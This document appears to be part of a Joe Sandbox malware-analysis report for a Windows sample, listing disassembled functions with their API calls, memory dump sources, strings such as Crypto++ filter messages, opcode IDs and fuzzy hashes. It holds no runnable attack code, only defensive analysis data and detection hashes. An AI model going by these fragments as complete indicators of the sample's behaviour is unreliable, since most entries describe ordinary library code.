                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,00A821E5,00000000,?,00000000,00000000), ref: 00A7C618
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: 7b823c06aa36498293e18d83ede4235b4c4b4898b26cea61b5303c5b6304d9e9
                                          • Instruction ID: e995d3c97fa94abf7df316d04152ae2ae506bdb2237777cf74299cb23f993443
                                          • Opcode Fuzzy Hash: 7b823c06aa36498293e18d83ede4235b4c4b4898b26cea61b5303c5b6304d9e9
                                          • Instruction Fuzzy Hash: E5015E726016157BAB2196B65DCCC7B6A7DDBC6FA1314D12DF908D7101EE608D0281B0
                                          Function 00A2A86D Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Maklocstr$Maklocchr
                                          • String ID:
                                          • API String ID: 2020259771-0
                                          • Opcode ID: b2768d83cb8bd2b668e84266e9b64a8b8d2f120ca9f4315bf2f1157761f7298e
                                          • Instruction ID: 830a2c26f550ccc1cf1fbb969bc711c9815183f3146f609f71994f78da2766a7
                                          • Opcode Fuzzy Hash: b2768d83cb8bd2b668e84266e9b64a8b8d2f120ca9f4315bf2f1157761f7298e
                                          • Instruction Fuzzy Hash: 5A11C1B19407547FE720DBA8A981F12B7ECEF14350F08492AF144CB641E374FC4487A6
                                          Function 00A3869B Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A386A2
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A386AC
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • std::_Facet_Register.LIBCPMT ref: 00A386FD
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A3871D
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A3873B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                          • String ID:
                                          • API String ID: 651022567-0
                                          • Opcode ID: 97ffbf052b5cf885984b63f869fc650b2d73768a7cb5cccd53c989ba95652fdc
                                          • Instruction ID: 21cf947d61d0193b445f3ddae4375c2ca3d1077973e5e5e80d509d0b5058b804
                                          • Opcode Fuzzy Hash: 97ffbf052b5cf885984b63f869fc650b2d73768a7cb5cccd53c989ba95652fdc
                                          • Instruction Fuzzy Hash: 351182369002289BCF05EBA4DE52AFEB7B5FF84720F240519F4116B291DF789E01C791
                                          Function 00A38741 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A38748
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A38752
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • std::_Facet_Register.LIBCPMT ref: 00A387A3
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A387C3
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A387E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                          • String ID:
                                          • API String ID: 651022567-0
                                          • Opcode ID: 0177f8beb2403fc075e55473f26cfe2280a63046a32ba3d86db6577da015f8b7
                                          • Instruction ID: 20b3ef4612fae28a04943b8aab185bedee7e707a3e7edca5a722c8e82059860b
                                          • Opcode Fuzzy Hash: 0177f8beb2403fc075e55473f26cfe2280a63046a32ba3d86db6577da015f8b7
                                          • Instruction Fuzzy Hash: CE1170369002289BCF05EBA4DA52AEE77B5AF84720F240519F4116B291DF789E41C791
                                          Function 00A389D9 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A389E0
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A389EA
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • std::_Facet_Register.LIBCPMT ref: 00A38A3B
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A38A5B
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A38A79
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                          • String ID:
                                          • API String ID: 651022567-0
                                          • Opcode ID: 946bad8d070f806248f465235485fba95b0d033e29eba0ca74db3dd1376fc023
                                          • Instruction ID: 894240e38d61d33096069ba2520ad8b7f36094ab1deb033ec35fdeaee67a3d78
                                          • Opcode Fuzzy Hash: 946bad8d070f806248f465235485fba95b0d033e29eba0ca74db3dd1376fc023
                                          • Instruction Fuzzy Hash: F611C272D002289BCF05EBA4CA56AFE77B5BF84720F25041AF4117B291CF389E41CB91
                                          Function 00A38933 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A3893A
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A38944
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • std::_Facet_Register.LIBCPMT ref: 00A38995
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A389B5
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A389D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                          • String ID:
                                          • API String ID: 651022567-0
                                          • Opcode ID: c848394e40ee5122a1c1723f267e99148de3a21beb98aecc697102e9d6452690
                                          • Instruction ID: c6df13ec2bd3ffde36b8e6d0981373effc72e09bdf197c6ca1e0fa8f71f5d3b7
                                          • Opcode Fuzzy Hash: c848394e40ee5122a1c1723f267e99148de3a21beb98aecc697102e9d6452690
                                          • Instruction Fuzzy Hash: F0118232A002289BCF05EBA4DA56BFE77B5FF84720F244519F5116B2A1CF789E41C791
                                          Function 00A743FE Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,00A659B8,00A75BD7,?,?,00A57B27,?,?,?,?,?,009B1F07,?,?), ref: 00A74403
                                          • _free.LIBCMT ref: 00A74438
                                          • _free.LIBCMT ref: 00A7445F
                                          • SetLastError.KERNEL32(00000000,?,?,?), ref: 00A7446C
                                          • SetLastError.KERNEL32(00000000,?,?,?), ref: 00A74475
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          • Opcode ID: ad8149d13f080a3d44908ca4d11a615dde3c54617319a4374354cc8a848eae57
                                          • Instruction ID: 25de8ce91bf52c391c9baf65dce233358929299e13a24370137d03fb223d26f8
                                          • Opcode Fuzzy Hash: ad8149d13f080a3d44908ca4d11a615dde3c54617319a4374354cc8a848eae57
                                          • Instruction Fuzzy Hash: FF01F4372406406B9A22A7B96D45F2B267EABC9775721C12AF41D92292EF248A066121
                                          Function 00A70292 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00A702B0
                                            • Part of subcall function 00A74D66: HeapFree.KERNEL32(00000000,00000000,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?), ref: 00A74D7C
                                            • Part of subcall function 00A74D66: GetLastError.KERNEL32(?,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?,?), ref: 00A74D8E
                                          • _free.LIBCMT ref: 00A702C2
                                          • _free.LIBCMT ref: 00A702D5
                                          • _free.LIBCMT ref: 00A702E6
                                          • _free.LIBCMT ref: 00A702F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 9c023f0782a39cdc82d1fd9d77b09cb342bbf2b652a55aafff20a32c647d2f0b
                                          • Instruction ID: 7b261bbd70f6805b51a42f52351bf00fb2b5c557d12af60074fe101ffbdda480
                                          • Opcode Fuzzy Hash: 9c023f0782a39cdc82d1fd9d77b09cb342bbf2b652a55aafff20a32c647d2f0b
                                          • Instruction Fuzzy Hash: EFF0DAB58022209FDB35FFD8FD218463B61B7497A0311C11BF45E562B2D7358A438BC6
                                          Function 009FEDA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 204COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009FEFB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: 0$w#G!
                                          • API String ID: 2659868963-3192620746
                                          • Opcode ID: 043d44b60566702ed769d8ebd315b7bcc81201d46041899f4cba8318c0ddc527
                                          • Instruction ID: dedc535b156586a7b9c572a0643b2200918af78f76128d2ea023bfd082d39f01
                                          • Opcode Fuzzy Hash: 043d44b60566702ed769d8ebd315b7bcc81201d46041899f4cba8318c0ddc527
                                          • Instruction Fuzzy Hash: FD71BD71D0064DDFDB15CFA9D841BAEFBB8FF98314F10861AE915A7280E774AA44CB90
                                          Function 00A10CD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A10D8E
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A10DF9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_type_info_name
                                          • String ID: ThisPointer:$ValueNames
                                          • API String ID: 1734802720-2375088429
                                          • Opcode ID: 2e3417bb504b67139f19192599adf51c0e25bbf5e2aeddafb533b53f6b95ff73
                                          • Instruction ID: d0441c96eaaef2bab93deeed84b44ddcd6807768cb0fc77c1394e9c93d2a8469
                                          • Opcode Fuzzy Hash: 2e3417bb504b67139f19192599adf51c0e25bbf5e2aeddafb533b53f6b95ff73
                                          • Instruction Fuzzy Hash: C3510535304340AFCB219F649C81EA7BBE6BF99704F044D1DF9CA97242D7A2E988C761
                                          Function 00A10AE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A10B9E
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A10C09
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_type_info_name
                                          • String ID: ThisPointer:$ValueNames
                                          • API String ID: 1734802720-2375088429
                                          • Opcode ID: 403c093c8e00b236161f1c3587df0c784dd9c9fc75c32edd9bd7517c18ff3d36
                                          • Instruction ID: c0048d6d14500782ee5b10a04d950a1d1ec06cdafe3b77bf46ac16abe9c99ec5
                                          • Opcode Fuzzy Hash: 403c093c8e00b236161f1c3587df0c784dd9c9fc75c32edd9bd7517c18ff3d36
                                          • Instruction Fuzzy Hash: 5151E6313083406FCB219F249D81EA7BBE6BF55748F04895DF58687342D7B2E988CB55
                                          Function 00A7AF4B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00A7B060
                                            • Part of subcall function 00A7AE50: __alloca_probe_16.LIBCMT ref: 00A7AEB9
                                            • Part of subcall function 00A7AE50: WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00A7AF16
                                            • Part of subcall function 00A7AE50: __freea.LIBCMT ref: 00A7AF1F
                                          • _free.LIBCMT ref: 00A7AFB6
                                            • Part of subcall function 00A74D66: HeapFree.KERNEL32(00000000,00000000,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?), ref: 00A74D7C
                                            • Part of subcall function 00A74D66: GetLastError.KERNEL32(?,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?,?), ref: 00A74D8E
                                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00A7AFF1
                                            • Part of subcall function 00A74D09: HeapAlloc.KERNEL32(00000008,?,00000000,?,00A7442F,00000001,00000364,?,00A57B27,?,?,?,?,?,009B1F07,?), ref: 00A74D4A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast_free$AllocByteCharFreeMultiWide__alloca_probe_16__freea
                                          • String ID: w#G!
                                          • API String ID: 1317440246-519468572
                                          • Opcode ID: cb8a778dbe42880aa936976981ea8dc9ab6663bfe9db2097d8944eb06623397b
                                          • Instruction ID: 0b97647eeb758992e9f517f0ecb3c4a761e042e03dca8d93f3e199ed114b0cbf
                                          • Opcode Fuzzy Hash: cb8a778dbe42880aa936976981ea8dc9ab6663bfe9db2097d8944eb06623397b
                                          • Instruction Fuzzy Hash: 3441B1B2910129AADF31AF659D42F9B7BB9EF45310F10C0A5F91CE3182EB318D519B71
                                          Function 00A04900 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 149COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __aullrem$Exception@8Throw
                                          • String ID: w#G!
                                          • API String ID: 4166652736-519468572
                                          • Opcode ID: c8b92e835a4cf26c73dd5f9fde0612dd1c6088cb683f4c83d5963cefc4cfa8b8
                                          • Instruction ID: 5ca75af59b6d990380f7a8205a717d16557f90494798dfc1b325cdceb36005a3
                                          • Opcode Fuzzy Hash: c8b92e835a4cf26c73dd5f9fde0612dd1c6088cb683f4c83d5963cefc4cfa8b8
                                          • Instruction Fuzzy Hash: 4341F276B042198BCB18DF28ED51B7FF3A5BBC9350F45863EEA0597280DA31EE058681
                                          Function 009FC430 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FC59D
                                          Strings
                                          • w#G!, xrefs: 009FC444
                                          • BlockPaddingScheme, xrefs: 009FC52D
                                          • StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher, xrefs: 009FC577
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: BlockPaddingScheme$StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher$w#G!
                                          • API String ID: 2005118841-3480149324
                                          • Opcode ID: 34fffaa42fb373b1c0f79f36c0a3677d68116fe87300fad0d200687923d7c25b
                                          • Instruction ID: 62eb48e00686db9ba988620df3c769112f189451810cb4fe2f0d1cffb63ac79f
                                          • Opcode Fuzzy Hash: 34fffaa42fb373b1c0f79f36c0a3677d68116fe87300fad0d200687923d7c25b
                                          • Instruction Fuzzy Hash: 5051DFB0A04749EFCB15DF64C945BAEBBF4FF45304F10445AE911AB391D7B4AA08CB90
                                          Function 00A3B32E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 00A3B335
                                            • Part of subcall function 009E8DC0: std::_Lockit::_Lockit.LIBCPMT ref: 009E8E09
                                            • Part of subcall function 009E8DC0: std::_Lockit::_Lockit.LIBCPMT ref: 009E8E2B
                                            • Part of subcall function 009E8DC0: std::_Lockit::~_Lockit.LIBCPMT ref: 009E8E4B
                                            • Part of subcall function 009E8DC0: std::_Lockit::~_Lockit.LIBCPMT ref: 009E8F18
                                          • _Find_unchecked1.LIBCPMT ref: 00A3B3DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
